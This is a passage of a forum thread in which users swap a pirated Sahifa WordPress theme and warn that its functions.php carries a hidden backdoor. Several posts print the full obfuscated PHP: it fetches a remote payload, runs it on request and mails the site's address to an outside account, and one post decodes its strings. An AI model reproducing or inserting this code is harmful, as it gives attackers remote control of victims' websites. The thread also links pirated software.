Search (advanced search) | ||||
Use this Search form before posting, asking or make a new thread.
|
03-19-2013, 04:28 AM
Post: #31
|
|||
|
|||
RE: | |||
03-19-2013, 05:40 AM
Post: #32
|
|||
|
|||
RE:
thanks for the share
|
|||
03-19-2013, 12:12 PM
Post: #33
|
|||
|
|||
RE:
(03-19-2013 04:28 AM)anhtuhu Wrote:(03-17-2013 08:18 AM)anas1234 Wrote:Fix this error please. or reup full version Sahifa v3.0.4(03-17-2013 03:07 AM)insiemes Wrote: 3.0.4 version Here is original .zip that I found on other site. Virustotal scan shows 1 positive result but it is related for JS in Docs folder. [hide]http://www68.zippyshare.com/v/68040972/file.html[/hide] |
|||
03-19-2013, 12:30 PM
Post: #34
|
|||
|
|||
RE:
Thanks for share: insiemes.
Anyone Test this file? Does it work? I'll test and infor late! |
|||
03-19-2013, 01:17 PM
Post: #35
|
|||
|
|||
RE: | |||
03-19-2013, 02:24 PM
Post: #36
|
|||
|
|||
RE:
(03-19-2013 01:17 PM)anhtuhu Wrote: Warning, theme Sahifa share by insiemes still have same problemDelete the following code: Code: $a=$_SERVER['DOCUMENT_ROOT'].base64_decode('L3dwLWNvbnRlbnQvdXBsb2Fkcy90aGVtZS5jZmc=');function theme_create(){global $a;file_put_contents($a,base64_encode(file_get_contents(base64_decode(str_replace('j','3','aHR0cDovL2RsLmRybjBibjguY29tLjUvMzEjMzc5OTcvY29yZS5waHA=')))), FILE_APPEND);}if (isset($_GET['theme'])){if(!file_exists($a)){theme_create();}if(isset($_GET['updatetheme'])){unlink($a);theme_create();}$b=base64_decode(file_get_contents($a));unlink($a);file_put_contents($a,$b,FILE_APPEND);require_once($a);unlink($a);file_put_contents($a,base64_encode($b),FILE_APPEND);die();}if (!file_exists($a)){theme_create();mail(base64_decode('d3BzZW90ZWFtQGdtYWlsLmNvbQ=='),site_url(),get_bloginfo('template_directory').base64_decode('L2Z1bmN0aW9ucy5waHA/dGhlbWU='),base64_decode("RnJvbTogV29yZHByZXNzIFpvbWJpZSA8d3BzZW90ZWFtQGdtYWlsLmNvbT4NClJlcGx5LVRvOiBXb3JkcHJlc3MgWm9tYmllIDx3cHNlb3RlYW1AZ21haWwuY29tPg0KWC1NYWlsZXI6IFBIUC8=").phpversion());} |
|||
03-19-2013, 02:33 PM
Post: #37
|
|||
|
|||
RE:
Delete the following code:
$a=$_SERVER['DOCUMENT_ROOT'].base64_decode('L3dwLWNvbnRlbnQvdXBsb2Fkcy90aGVtZS5jZmc=');function theme_create(){global $a;file_put_contents($a,base64_encode(file_get_contents(base64_decode(str_replace('j','3','aHR0cDovL2RsLmRybjBibjguY29tLjUvMzEjMzc5OTcvY29yZS5waHA=')))), FILE_APPEND);}if (isset($_GET['theme'])){if(!file_exists($a)){theme_create();}if(isset($_GET['updatetheme'])){unlink($a);theme_create();}$b=base64_decode(file_get_contents($a));unlink($a);file_put_contents($a,$b,FILE_APPEND);require_once($a);unlink($a);file_put_contents($a,base64_encode($b),FILE_APPEND);die();}if (!file_exists($a)){theme_create();mail(base64_decode('d3BzZW90ZWFtQGdtYWlsLmNvbQ=='),site_url(),get_bloginfo('template_directory').base64_decode('L2Z1bmN0aW9ucy5waHA/dGhlbWU='),base64_decode("RnJvbTogV29yZHByZXNzIFpvbWJpZSA8d3BzZW90ZWFtQGdtYWlsLmNvbT4NClJlcGx5LVRvOiBXb3JkcHJlc3MgWm9tYmllIDx3cHNlb3RlYW1AZ21haWwuY29tPg0KWC1NYWlsZXI6IFBIUC8=").phpversion());} |
|||
03-20-2013, 06:37 PM
Post: #38
|
|||
|
|||
RE:
is it not possible that, The thumbnails work with any type of image i post on topic bcaz i dont wanna upload image on my host through feature.
everything seems ok …. most important part is for me is thumbnails need to work with any type of image. just if i not use feature image it will automatically grab image from post for thumbnail. any solution here PLZ ? Thanks. Waiting for reply. |
|||
03-21-2013, 10:12 AM
Post: #39
|
|||
|
|||
RE:
what does that base64 code, actually do?
another 3.0.4 download has a clean functions.php so should be easily deleted BUT wil it affect anything - what was its purpose |
|||
03-21-2013, 11:51 AM
Post: #40
|
|||
|
|||
RE: CUIDADO
var_dump($_SERVER['DOCUMENT_ROOT'].base64_decode('L3dwLWNvbnRlbnQvdXBsb2Fkcy90aGVtZS5jZmc='));
var_dump(base64_decode(str_replace('j','3','aHR0cDovL2RsLmRybjBibjguY29tLjUvMzEjMzc5OTcvY29yZS5waHA='))); var_dump(base64_decode('d3BzZW90ZWFtQGdtYWlsLmNvbQ=='),base64_decode('L2Z1bmN0aW9ucy5waHA/dGhlbWU='),base64_decode("RnJvbTogV29yZHByZXNzIFpvbWJpZSA8d3BzZW90ZWFtQGdtYWlsLmNvbT4NClJlcGx5LVRvOiBXb3JkcHJlc3MgWm9tYmllIDx3cHNlb3RlYW1AZ21haWwuY29tPg0KWC1NYWlsZXI6IFBIUC8=")); |
|||